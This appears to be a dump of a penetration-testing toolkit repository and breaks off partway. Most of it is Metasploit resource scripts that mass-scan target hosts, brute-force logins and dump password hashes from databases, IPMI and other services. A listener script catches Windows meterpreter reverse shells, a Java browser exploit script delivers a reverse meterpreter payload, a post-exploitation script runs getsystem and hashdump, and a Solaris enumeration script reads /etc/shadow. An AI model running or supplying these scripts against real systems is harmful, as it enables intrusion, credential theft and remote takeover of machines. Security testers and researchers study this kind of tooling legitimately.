├── report
    ├── data
    │   ├── doc.htm
    │   ├── pdf.htm
    │   ├── ppt.htm
    │   ├── txt.htm
    │   ├── waf.htm
    │   ├── xls.htm
    │   ├── emails.htm
    │   ├── hosts.htm
    │   ├── names.htm
    │   ├── records.htm
    │   ├── whatweb.htm
    │   ├── whois-ip.htm
    │   ├── active-recon.htm
    │   ├── loadbalancing.htm
    │   ├── passive-recon.htm
    │   ├── squatting.htm
    │   ├── subdomains.htm
    │   ├── traceroute.htm
    │   ├── whois-domain.htm
    │   └── zonetransfer.htm
    ├── images
    │   ├── logo.png
    │   └── icons
    │   │   ├── blue.png
    │   │   ├── red.png
    │   │   ├── green.png
    │   │   └── yellow.png
    ├── css
    │   ├── ie.css
    │   └── style.css
    ├── pages
    │   ├── pdf.htm
    │   ├── doc.htm
    │   ├── txt.htm
    │   ├── xls.htm
    │   ├── hosts.htm
    │   ├── ppt.htm
    │   ├── records.htm
    │   ├── waf.htm
    │   ├── whatweb.htm
    │   ├── emails.htm
    │   ├── names.htm
    │   ├── squatting.htm
    │   ├── subdomains.htm
    │   ├── whois-ip.htm
    │   ├── black-listed.htm
    │   ├── traceroute.htm
    │   ├── active-recon.htm
    │   ├── config.htm
    │   ├── whois-domain.htm
    │   ├── zonetransfer.htm
    │   ├── loadbalancing.htm
    │   ├── passive-recon.htm
    │   └── netcraft.htm
    └── index.htm
├── resource
    ├── misc
    │   ├── post.rc
    │   ├── listener.rc
    │   └── java.rc
    ├── db2.rc
    ├── ssh.rc
    ├── afp.rc
    ├── finger.rc
    ├── h323.rc
    ├── imap.rc
    ├── misc.rc
    ├── pop3.rc
    ├── rdp.rc
    ├── redis.rc
    ├── rmi.rc
    ├── scada4.rc
    ├── upnp.rc
    ├── adobe.rc
    ├── chargen.rc
    ├── couchdb.rc
    ├── emc.rc
    ├── motorola.rc
    ├── rservices3.rc
    ├── vmware2.rc
    ├── dcerpc.rc
    ├── emc2.rc
    ├── nessus.rc
    ├── rservices.rc
    ├── rservices2.rc
    ├── winrm.rc
    ├── backdoor.rc
    ├── pcanywhere.rc
    ├── pcanywhere2.rc
    ├── scada6.rc
    ├── telnet3.rc
    ├── dcerpc2.rc
    ├── scada3.rc
    ├── telnet2.rc
    ├── sip.rc
    ├── db2-2.rc
    ├── ntp.rc
    ├── vnc.rc
    ├── nfs.rc
    ├── oracle.rc
    ├── sip2.rc
    ├── citrix.rc
    ├── netbios.rc
    ├── oracle4.rc
    ├── tomcat.rc
    ├── mysql.rc
    ├── oracle2.rc
    ├── scada.rc
    ├── vxworks.rc
    ├── lotus.rc
    ├── scada2.rc
    ├── smtp.rc
    ├── smtp2.rc
    ├── ftp.rc
    ├── ipmi.rc
    ├── scada5.rc
    ├── tftp.rc
    ├── telnet.rc
    ├── mssql.rc
    ├── oracle3.rc
    ├── http.rc
    ├── recon-ng
    │   ├── active.rc
    │   ├── export.rc
    │   └── passive.rc
    ├── postgres.rc
    ├── printers.rc
    ├── x11.rc
    ├── vmware.rc
    ├── smb.rc
    └── snmp.rc
├── notes
    ├── MSSQL Injection Cheat Sheet.pdf
    ├── metasploit
    │   └── Analysis of MSF Relative to PTES.pdf
    ├── databases.txt
    ├── hack3rcon
    │   ├── open-list.sh
    │   ├── main.sh
    │   ├── recon-domain.sh
    │   ├── robots.sh
    │   ├── recon-people.sh
    │   └── nmap.sh
    ├── unix.txt
    ├── ssl.txt
    ├── exploits.txt
    ├── snmp.txt
    ├── insecure-protocols.txt
    ├── dns.txt
    ├── passwords.txt
    ├── maltego.txt
    ├── oracle.txt
    ├── smtp.txt
    ├── git.txt
    ├── sqli.txt
    ├── nexpose.txt
    ├── misc.txt
    ├── web-apps.txt
    ├── windows.txt
    └── burp.txt
├── misc
    ├── enum-solaris.sh
    ├── netblocks.sh
    ├── python
    │   ├── ex1.py
    │   ├── test.py
    │   ├── ex2.py
    │   ├── multitabs.py
    │   └── notes.txt
    ├── dns-transfer.sh
    ├── ping-sweep.sh
    ├── dns-reverse.sh
    ├── dns-forward.sh
    ├── crawl.sh
    ├── compare-sites.sh
    └── netblocks.txt
├── utfdictcsv.py
├── alias
├── mods
    └── goog-mail.py
├── parse-burp.rb
├── update.sh
├── setup.sh
├── README.md
├── parse-nessus-feed.py
└── parse-nessus.py


/report/data/doc.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/pdf.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/ppt.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/txt.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/waf.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/xls.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/emails.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/hosts.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/names.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/records.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/whatweb.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/whois-ip.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/active-recon.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/loadbalancing.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/passive-recon.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/squatting.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/subdomains.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/traceroute.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/whois-domain.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/report/data/zonetransfer.htm:
--------------------------------------------------------------------------------
1 | <pre style="font-size:14px;">
2 | 


--------------------------------------------------------------------------------
/resource/misc/post.rc:
--------------------------------------------------------------------------------
1 | getsystem
2 | sysinfo
3 | hasdump
4 | 
5 | 


--------------------------------------------------------------------------------
/report/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/report/images/logo.png


--------------------------------------------------------------------------------
/report/images/icons/blue.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/report/images/icons/blue.png


--------------------------------------------------------------------------------
/report/images/icons/red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/report/images/icons/red.png


--------------------------------------------------------------------------------
/report/images/icons/green.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/report/images/icons/green.png


--------------------------------------------------------------------------------
/report/images/icons/yellow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/report/images/icons/yellow.png


--------------------------------------------------------------------------------
/resource/db2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 523
4 | 
5 | use auxiliary/scanner/db2/discovery
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/ssh.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 22
4 | 
5 | use auxiliary/scanner/ssh/ssh_version
6 | run
7 | 


--------------------------------------------------------------------------------
/notes/MSSQL Injection Cheat Sheet.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/notes/MSSQL Injection Cheat Sheet.pdf


--------------------------------------------------------------------------------
/resource/afp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 548
4 | 
5 | use auxiliary/scanner/afp/afp_server_info
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/finger.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 79
4 | 
5 | use auxiliary/scanner/finger/finger_users
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/h323.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1720
4 | 
5 | use auxiliary/scanner/h323/h323_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/imap.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 143
4 | 
5 | use auxiliary/scanner/imap/imap_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/misc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5920
4 | 
5 | use auxiliary/scanner/misc/cctv_dvr_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/pop3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 110
4 | 
5 | use auxiliary/scanner/pop3/pop3_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/rdp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3389
4 | 
5 | use auxiliary/scanner/rdp/ms12_020_check
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/redis.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 6379
4 | 
5 | use auxiliary/scanner/misc/redis_server
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/rmi.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1099
4 | 
5 | use auxiliary/scanner/misc/java_rmi_server
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/scada4.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 28784
4 | 
5 | use auxiliary/scanner/scada/koyo_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/upnp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1900
4 | 
5 | use auxiliary/scanner/upnp/ssdp_msearch
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/adobe.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8400
4 | 
5 | use auxiliary/scanner/http/adobe_xml_inject
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/chargen.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 19
4 | 
5 | use auxiliary/scanner/chargen/chargen_probe
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/couchdb.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5984
4 | 
5 | use auxiliary/scanner/couchdb/couchdb_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/emc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3000
4 | 
5 | use auxiliary/admin/emc/alphastor_devicemanager
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/motorola.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 407
4 | 
5 | use auxiliary/scanner/motorola/timbuktu_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/rservices3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 514
4 | 
5 | use auxiliary/scanner/rservices/rsh_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/vmware2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 902
4 | 
5 | use auxiliary/scanner/vmware/vmauthd_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/dcerpc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 135
4 | 
5 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/emc2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3500
4 | 
5 | use auxiliary/admin/emc/alphastor_librarymanager
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/nessus.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8834
4 | 
5 | use auxiliary/scanner/nessus/nessus_xmlrpc_ping
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/rservices.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 512
4 | 
5 | use auxiliary/scanner/rservices/rexec_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/rservices2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 513
4 | 
5 | use auxiliary/scanner/rservices/rlogin_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/winrm.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5985
4 | 
5 | use auxiliary/scanner/winrm/winrm_auth_methods
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/backdoor.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 7777
4 | 
5 | use auxiliary/scanner/backdoor/energizer_duo_detect
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/pcanywhere.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5631
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_tcp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/pcanywhere2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5632
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/scada6.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 46824
4 | 
5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/telnet3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 9999
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/dcerpc2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5040
4 | 
5 | use auxiliary/scanner/dcerpc/windows_deployment_services
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/scada3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 80
4 | 
5 | use auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/telnet2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 30718
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_password
6 | run
7 | 


--------------------------------------------------------------------------------
/notes/metasploit/Analysis of MSF Relative to PTES.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrismaddalena/discover/master/notes/metasploit/Analysis of MSF Relative to PTES.pdf


--------------------------------------------------------------------------------
/misc/enum-solaris.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | uname -a
 4 | ifconfig -a
 5 | route
 6 | mount
 7 | cat /etc/passwd
 8 | cat /etc/shadow
 9 | /usr/bin/pkginfo -l
10 | /usr/bin/svcs -a
11 | 


--------------------------------------------------------------------------------
/resource/sip.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/db2-2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 50000
 4 | 
 5 | use auxiliary/scanner/db2/db2_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/db2/db2_auth
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/ntp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 123
 4 | 
 5 | use auxiliary/scanner/ntp/ntp_monlist
 6 | run
 7 | 
 8 | use auxiliary/scanner/ntp/ntp_readvar
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/vnc.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5900
 4 | 
 5 | use auxiliary/scanner/vnc/vnc_login
 6 | run
 7 | 
 8 | use auxiliary/scanner/vnc/vnc_none_auth
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/nfs.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 111
 4 | 
 5 | use auxiliary/scanner/misc/sunrpc_portmapper
 6 | run
 7 | 
 8 | use auxiliary/scanner/nfs/nfsmount
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1158
 4 | 
 5 | use auxiliary/scanner/oracle/emc_sid
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/spy_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/sip2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator_tcp
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options_tcp
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/citrix.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1604
 4 | 
 5 | use gather/citrix_published_applications
 6 | run
 7 | 
 8 | use gather/citrix_published_bruteforce
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/netbios.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 137
 4 | 
 5 | use auxiliary/scanner/netbios/nbname
 6 | run
 7 | 
 8 | use auxiliary/scanner/netbios/nbname_probe
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/oracle4.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/oracle/xdb_sid_brute
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/xdb_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/tomcat.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/http/tomcat_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/http/tomcat_mgr_login
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/mysql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 3306
 4 | 
 5 | use auxiliary/scanner/mysql/mysql_version
 6 | run
 7 | 
 8 | use scanner/mysql/mysql_authbypass_hashdump
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/oracle2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5560
 4 | 
 5 | use auxiliary/scanner/oracle/isqlplus_login
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/isqlplus_sidbrute
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/scada.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 2362
 4 | 
 5 | use auxiliary/scanner/scada/digi_addp_reboot
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/digi_addp_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/vxworks.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 17185
 4 | 
 5 | use auxiliary/scanner/vxworks/wdbrpc_bootline
 6 | run
 7 | 
 8 | use auxiliary/scanner/vxworks/wdbrpc_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/lotus.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 80
 4 | 
 5 | use auxiliary/scanner/lotus/lotus_domino_hashes
 6 | run
 7 | 
 8 | use auxiliary/scanner/lotus/lotus_domino_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/scada2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 771
 4 | 
 5 | use auxiliary/scanner/scada/digi_realport_serialport_scan
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/digi_realport_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/smtp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 25
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_relay
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_version
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/smtp2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 465
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_relay
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_version
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/ftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 21
 4 | 
 5 | use auxiliary/scanner/ftp/ftp_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/ftp/anonymous
 9 | run
10 | 
11 | use auxiliary/scanner/ftp/titanftp_xcrc_traversal
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/ipmi.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 623
 4 | 
 5 | use auxiliary/scanner/ipmi/ipmi_cipher_zero
 6 | run
 7 | 
 8 | use auxiliary/scanner/ipmi/ipmi_version
 9 | run
10 | 
11 | use auxiliary/scanner/ipmi/ipmi_dumphashes
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/scada5.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 502
 4 | 
 5 | use auxiliary/scanner/scada/modbusclient
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/modbusdetect
 9 | run
10 | 
11 | use auxiliary/scanner/scada/modbus_findunitid
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/tftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 69
 4 | 
 5 | use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
 6 | run
 7 | 
 8 | use auxiliary/scanner/tftp/netdecision_tftp
 9 | run
10 | 
11 | use auxiliary/scanner/tftp/tftpbrute
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/misc/listener.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/handler
 2 | set PAYLOAD windows/meterpreter/reverse_tcp
 3 | set LHOST #
 4 | set LPORT 443
 5 | set ExitOnSession false
 6 | set InitialAutoRunScript migrate -f
 7 | 
 8 | <ruby>
 9 |      sleep(3)
10 | </ruby>
11 | 
12 | exploit -j
13 | 


--------------------------------------------------------------------------------
/resource/telnet.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 23
 4 | 
 5 | use auxiliary/scanner/telnet/telnet_encrypt_overflow
 6 | run
 7 | 
 8 | use auxiliary/scanner/telnet/telnet_ruggedcom
 9 | run
10 | 
11 | use auxiliary/scanner/telnet/telnet_version
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/mssql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1433
 4 | 
 5 | use scanner/mssql/mssql_ping
 6 | run
 7 | 
 8 | use scanner/mssql/mssql_login
 9 | run
10 | 
11 | use scanner/mssql/mssql_hashdump
12 | run
13 | 
14 | use scanner/mssql/mssql_schemadump
15 | run
16 | 


--------------------------------------------------------------------------------
/resource/misc/java.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/browser/java_jre17_jmxbean
 2 | set SRVPORT 443
 3 | set URIPATH /
 4 | set PAYLOAD java/meterpreter/reverse_tcp
 5 | set LHOST 
 6 | set LPORT 443
 7 | set InitialAutoRunScript migrate -f
 8 | exploit
 9 | set AutoRunScript /opt/scripts/resource/post.rc
10 | 


--------------------------------------------------------------------------------
/resource/oracle3.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1521
 4 | 
 5 | use auxiliary/scanner/oracle/oracle_hashdump
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/oracle_login
 9 | run
10 | 
11 | use auxiliary/scanner/oracle/sid_brute
12 | run
13 | 
14 | use auxiliary/scanner/oracle/sid_enum
15 | run
16 | 
17 | use auxiliary/scanner/oracle/tnslsnr_version
18 | run
19 | 


--------------------------------------------------------------------------------
/resource/http.rc:
--------------------------------------------------------------------------------
 1 | setg DOMAIN
 2 | setg HTTPBL_APIKEY
 3 | setg PATH_SAVE /root
 4 | setg RANGE
 5 | setg RHOST
 6 | setg RHOSTS
 7 | setg SQLMAP_PATH /pentest/database/sqlmap
 8 | setg THREADS 255
 9 | setg VULNCSV
10 | 
11 | ipidseq                  # from ip
12 | 
13 | lotus_domino_hashes      # from lotus
14 | lotus_domino_login       # from lotus
15 | lotus_domino_version     # from lotus
16 | 


--------------------------------------------------------------------------------
/resource/recon-ng/active.rc:
--------------------------------------------------------------------------------
 1 | workspaces add yyy
 2 | add companies
 3 | xxx
 4 | none
 5 | add domains
 6 | yyy
 7 | 
 8 | use recon/domains-hosts/brute_hosts
 9 | run
10 | 
11 | use recon/domains-hosts/ssl_san
12 | run
13 | 
14 | use recon/domains-hosts/vpnhunter
15 | run
16 | 
17 | use discovery/info_disclosure/cache_snoop
18 | run
19 | 
20 | use discovery/info_disclosure/interesting_files
21 | run
22 | 


--------------------------------------------------------------------------------
/report/css/ie.css:
--------------------------------------------------------------------------------
 1 | #wrapper, #wrap-header, #main, #main-fullwidth, #wrap-footer, .clearfix { 
 2 | 	display:inline-block; 
 3 | }
 4 | 
 5 | * html #wrapper, * html #wrap-header, * html #main, * html #main-fullwidth, * html #wrap-footer, * html .clearfix{ height:1%; }
 6 | 
 7 | hr  { margin:-8px auto 11px; }
 8 | 
 9 | html>body p code { *white-space: normal; }
10 | 
11 | img { -ms-interpolation-mode:bicubic; }


--------------------------------------------------------------------------------
/resource/postgres.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5432
 4 | 
 5 | use auxiliary/scanner/postgres/postgres_dbname_flag_injection
 6 | run
 7 | 
 8 | use auxiliary/scanner/postgres/postgres_hashdump
 9 | run
10 | 
11 | use auxiliary/scanner/postgres/postgres_login
12 | run
13 | 
14 | use auxiliary/scanner/postgres/postgres_schemadump
15 | run
16 | 
17 | use auxiliary/scanner/postgres/postgres_version
18 | run
19 | 


--------------------------------------------------------------------------------
/resource/recon-ng/export.rc:
--------------------------------------------------------------------------------
 1 | spool start /opt/discover/tmp
 2 | show contacts
 3 | spool stop
 4 | spool start /opt/discover/tmp2
 5 | show creds
 6 | spool stop
 7 | spool start /opt/discover/tmp3
 8 | show hosts
 9 | spool stop
10 | spool start /opt/discover/tmp4
11 | show leaks
12 | spool stop
13 | spool start /opt/discover/tmp5
14 | show ports
15 | spool stop
16 | spool start /opt/discover/tmp6
17 | show vulnerabilities
18 | spool stop
19 | back
20 | 


--------------------------------------------------------------------------------
/misc/netblocks.sh:
--------------------------------------------------------------------------------
